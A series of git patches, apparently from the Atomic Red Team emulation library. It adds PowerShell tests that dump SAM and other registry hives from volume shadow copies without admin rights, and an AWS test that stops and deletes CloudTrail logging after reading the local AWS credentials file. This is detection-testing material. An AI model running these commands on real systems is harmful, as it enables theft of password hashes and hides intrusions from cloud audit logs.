@@ -759,3 +759,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 7b697ece-8270-46b5-bbc7-6b9e27081831
 419cca0c-fa52-4572-b0d7-bc7c6f388a27
 441b1a0f-a771-428a-8af0-e99e4698cda3
+eeb9751a-d598-42d3-b11c-c122d9c3f6c7

From 8d84482954bbe5d9e5ada9df3c5b10483b5c3c88 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Sat, 7 Aug 2021 18:14:40 +0000
Subject: [PATCH 06/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 30 ++++++++++++
 atomics/T1003.002/T1003.002.md                | 48 +++++++++++++++++++
 6 files changed, 82 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 45bbdc86..55fa2871 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -76,6 +76,7 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a1f784a4..3f7d3f9e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -52,6 +52,7 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 44a94f8d..8aa3bf01 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -122,6 +122,7 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 97ec109c..a5799b2d 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -90,6 +90,7 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 54940482..74487a9b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -5440,6 +5440,36 @@ credential-access:
           Invoke-PowerDump
         name: powershell
         elevation_required: true
+    - name: dump volume shadow copy hive with certutil
+      auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+      description: |
+        Dump the SAM hive from volume shadow copies with the certutil utility
+        This can be done with a non-admin user account
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_path:
+          description: Path where the hive will be dumped
+          type: Path
+          default: "$ENV:temp"
+        file_name:
+          description: Name of the dumped hive
+          type: String
+          default: myhive
+      executor:
+        command: |
+          write-host ""
+          $shadowlist = get-wmiobject win32_shadowcopy
+          $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+          $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
+          certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+        name: powershell
+        elevation_required: false
+        cleanup_command: |
+          write-host ""
+          $toremove = #{file_path} + "\" + '#{file_name}'
+          rm $toremove
   T1555.002:
     technique:
       external_references:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index ad162a55..80948108 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -32,6 +32,8 @@ Notes:
 
 - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
 
+- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil)
+
 
 <br/>
 
@@ -204,4 +206,50 @@ Invoke-PowerDump
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - dump volume shadow copy hive with certutil
+Dump the SAM hive from volume shadow copies with the certutil utility
+This can be done with a non-admin user account
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | Path where the hive will be dumped | Path | $ENV:temp|
+| file_name | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
+certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{file_path} + "\" + '#{file_name}'
+rm $toremove
+```
+
+
+
+
+
 <br/>

From ddeb15ae41913d66c6b104c0807ee4a5e7d1ed8c Mon Sep 17 00:00:00 2001
From: Brandon Morgan <brandon.morgan@outlook.com>
Date: Mon, 9 Aug 2021 11:07:00 -0500
Subject: [PATCH 07/39] Update T1003.002.yaml (#1595)

Added test 6 to dump hives with System.IO.File.  Also tweaked test 5 so that the hive could be selected by the user, same as in test 6
---
 atomics/T1003.002/T1003.002.yaml | 52 +++++++++++++++++++++++++++-----
 1 file changed, 45 insertions(+), 7 deletions(-)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index d2efab7b..db4530ac 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -99,19 +99,23 @@ atomic_tests:
     name: powershell
     elevation_required: true
 
-- name: dump volume shadow copy hive with certutil
+- name: dump volume shadow copy hives with certutil
   auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
   description: |
-    Dump the SAM hive from volume shadow copies with the certutil utility
+    Dump hives from volume shadow copies with the certutil utility
     This can be done with a non-admin user account
   supported_platforms:
   - windows
   input_arguments:
-    file_path:
+    dump_path:
       description: Path where the hive will be dumped
       type: Path
       default: $ENV:temp
-    file_name:
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
       description: Name of the dumped hive
       type: String
       default: myhive
@@ -121,11 +125,45 @@ atomic_tests:
       $shadowlist = get-wmiobject win32_shadowcopy
       $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
       $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-      certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
     name: powershell
     elevation_required: false 
     cleanup_command: |
       write-host ""
-      $toremove = #{file_path} + "\" + '#{file_name}'
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
       rm $toremove
+
+- name: dump volume shadow copy hives with System.IO.File
+  description: |
+    Dump hives from volume shadow copies with System.IO.File
+  supported_platforms:
+  - windows
+  input_arguments:
+    dump_path:
+      description: Path where the hive will be dumped
+      type: Path
+      default: $ENV:temp
+    target_hive:
+      description: Hive you wish to dump
+      type: String
+      default: SAM
+    dumped_hive:
+      description: Name of the dumped hive
+      type: String
+      default: myhive
+  executor:
+    command: |
+      write-host ""
+      $shadowlist = get-wmiobject win32_shadowcopy
+      $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+      $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+      $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+      $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+      [System.IO.File]::Copy($shadowpath , $mydump)
+    name: powershell
+    elevation_required: false 
+    cleanup_command: |
+      write-host ""
+      $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+      rm $toremove
\ No newline at end of file

From bb1885e040f84ea13a5012a6b4bb338e342db639 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Mon, 9 Aug 2021 16:07:19 +0000
Subject: [PATCH 08/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1003.002/T1003.002.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index db4530ac..27c10567 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -135,6 +135,7 @@ atomic_tests:
       rm $toremove
 
 - name: dump volume shadow copy hives with System.IO.File
+  auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
   description: |
     Dump hives from volume shadow copies with System.IO.File
   supported_platforms:
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9cc61f62..04ced245 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -760,3 +760,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 419cca0c-fa52-4572-b0d7-bc7c6f388a27
 441b1a0f-a771-428a-8af0-e99e4698cda3
 eeb9751a-d598-42d3-b11c-c122d9c3f6c7
+9d77fed7-05f8-476e-a81b-8ff0472c64d0

From 6e4cbb9e85a5595cb3bb31a2fdfb14e3bd073886 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 9 Aug 2021 16:07:26 +0000
Subject: [PATCH 09/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  3 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv |  3 +-
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +-
 atomics/Indexes/index.yaml                    | 53 +++++++++++++--
 atomics/T1003.002/T1003.002.md                | 66 ++++++++++++++++---
 6 files changed, 112 insertions(+), 19 deletions(-)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 55fa2871..e9380dbe 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -76,7 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3f7d3f9e..3a96f7e7 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -52,7 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8aa3bf01..12dbc257 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -122,7 +122,8 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a5799b2d..a3558cd7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -90,7 +90,8 @@
   - Atomic Test #2: Registry parse with pypykatz [windows]
   - Atomic Test #3: esentutl.exe SAM copy [windows]
   - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
-  - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+  - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+  - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
 - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 74487a9b..4cfe28ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -5440,19 +5440,23 @@ credential-access:
           Invoke-PowerDump
         name: powershell
         elevation_required: true
-    - name: dump volume shadow copy hive with certutil
+    - name: dump volume shadow copy hives with certutil
       auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
       description: |
-        Dump the SAM hive from volume shadow copies with the certutil utility
+        Dump hives from volume shadow copies with the certutil utility
         This can be done with a non-admin user account
       supported_platforms:
       - windows
       input_arguments:
-        file_path:
+        dump_path:
           description: Path where the hive will be dumped
           type: Path
           default: "$ENV:temp"
-        file_name:
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
           description: Name of the dumped hive
           type: String
           default: myhive
@@ -5462,13 +5466,48 @@ credential-access:
           $shadowlist = get-wmiobject win32_shadowcopy
           $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
           $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-          certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
         name: powershell
         elevation_required: false
         cleanup_command: |
           write-host ""
-          $toremove = #{file_path} + "\" + '#{file_name}'
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+          rm $toremove
+    - name: dump volume shadow copy hives with System.IO.File
+      auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+      description: 'Dump hives from volume shadow copies with System.IO.File
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        dump_path:
+          description: Path where the hive will be dumped
+          type: Path
+          default: "$ENV:temp"
+        target_hive:
+          description: Hive you wish to dump
+          type: String
+          default: SAM
+        dumped_hive:
+          description: Name of the dumped hive
+          type: String
+          default: myhive
+      executor:
+        command: |
+          write-host ""
+          $shadowlist = get-wmiobject win32_shadowcopy
+          $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+          $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+          $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+          $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+          [System.IO.File]::Copy($shadowpath , $mydump)
+        name: powershell
+        elevation_required: false
+        cleanup_command: |-
+          write-host ""
+          $toremove = #{dump_path} + "\" + '#{dumped_hive}'
           rm $toremove
   T1555.002:
     technique:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 80948108..27f223f3 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -32,7 +32,9 @@ Notes:
 
 - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
 
-- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil)
+- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
+
+- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
 
 
 <br/>
@@ -209,8 +211,8 @@ Invoke-PowerDump
 <br/>
 <br/>
 
-## Atomic Test #5 - dump volume shadow copy hive with certutil
-Dump the SAM hive from volume shadow copies with the certutil utility
+## Atomic Test #5 - dump volume shadow copy hives with certutil
+Dump hives from volume shadow copies with the certutil utility
 This can be done with a non-admin user account
 
 **Supported Platforms:** Windows
@@ -225,8 +227,9 @@ This can be done with a non-admin user account
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_path | Path where the hive will be dumped | Path | $ENV:temp|
-| file_name | Name of the dumped hive | String | myhive|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
 
 
 #### Attack Commands: Run with `powershell`! 
@@ -237,14 +240,61 @@ write-host ""
 $shadowlist = get-wmiobject win32_shadowcopy
 $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
 $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
 ```
 
 #### Cleanup Commands:
 ```powershell
 write-host ""
-$toremove = #{file_path} + "\" + '#{file_name}'
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
+Dump hives from volume shadow copies with System.IO.File
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+$mydump = #{dump_path} + '\' + '#{dumped_hive}'
+[System.IO.File]::Copy($shadowpath , $mydump)
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
 rm $toremove
 ```
 

From 6fe437d2c1fb125a5ae3283d6f09843fbe7d8332 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Tue, 10 Aug 2021 12:23:02 +0530
Subject: [PATCH 10/39] Automated AWS cloudtrail changes

---
 atomics/T1562.008/T1562.008.yaml | 37 ++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 atomics/T1562.008/T1562.008.yaml

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
new file mode 100644
index 00000000..a40bdb36
--- /dev/null
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -0,0 +1,37 @@
+attack_technique: T1562.008
+display_name: 'Impair Defenses: Disable Cloud Logs'
+atomic_tests:
+- name: AWS CloudTrail Changes
+  auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+  description: |
+    Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    cloudtrail_name:
+      description: Name of the cloudTrail
+      type: String
+      default: "redatomictesttrail"
+    s3_bucket_name:
+      description: Name of the bucket
+      type: String
+      default: "functionaltesttrail"
+    region:
+      description: Name of the region
+      type: String
+      default: "us-east-1"
+  dependencies:
+    - description: |
+        Check if ~/.aws/credentials file has a default stanza is configured
+      prereq_command: |
+        cat ~/.aws/credentials | grep "default"
+      get_prereq_command: |
+        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  executor:
+    command: |
+       aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+       aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+       aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+       aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+    name: sh
+    elevation_required: false

From cd8ea24c61dcc53e728c62890459329ca2d208c9 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <esanya.araveti@kudelskisecurity.com>
Date: Wed, 11 Aug 2021 16:47:31 +0530
Subject: [PATCH 11/39] updated bucket policy

---
 atomics/T1562.008/T1562.008.yaml |  5 ++++-
 atomics/T1562.008/policy.json    | 28 ++++++++++++++++++++++++++++
 2 files changed, 32 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1562.008/policy.json

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index a40bdb36..ccddbecf 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -15,7 +15,7 @@ atomic_tests:
     s3_bucket_name:
       description: Name of the bucket
       type: String
-      default: "functionaltesttrail"
+      default: "redatomic-test"
     region:
       description: Name of the region
       type: String
@@ -25,6 +25,8 @@ atomic_tests:
         Check if ~/.aws/credentials file has a default stanza is configured
       prereq_command: |
         cat ~/.aws/credentials | grep "default"
+        aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+        aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/policy.json
       get_prereq_command: |
         echo Please install the aws-cli and configure your AWS defult profile using: aws configure
   executor:
@@ -33,5 +35,6 @@ atomic_tests:
        aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
        aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
        aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+       aws s3 rb s3://#{s3_bucket_name} --force 
     name: sh
     elevation_required: false
diff --git a/atomics/T1562.008/policy.json b/atomics/T1562.008/policy.json
new file mode 100644
index 00000000..ac55e733
--- /dev/null
+++ b/atomics/T1562.008/policy.json
@@ -0,0 +1,28 @@
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "AWSCloudTrailAclCheck20150319",
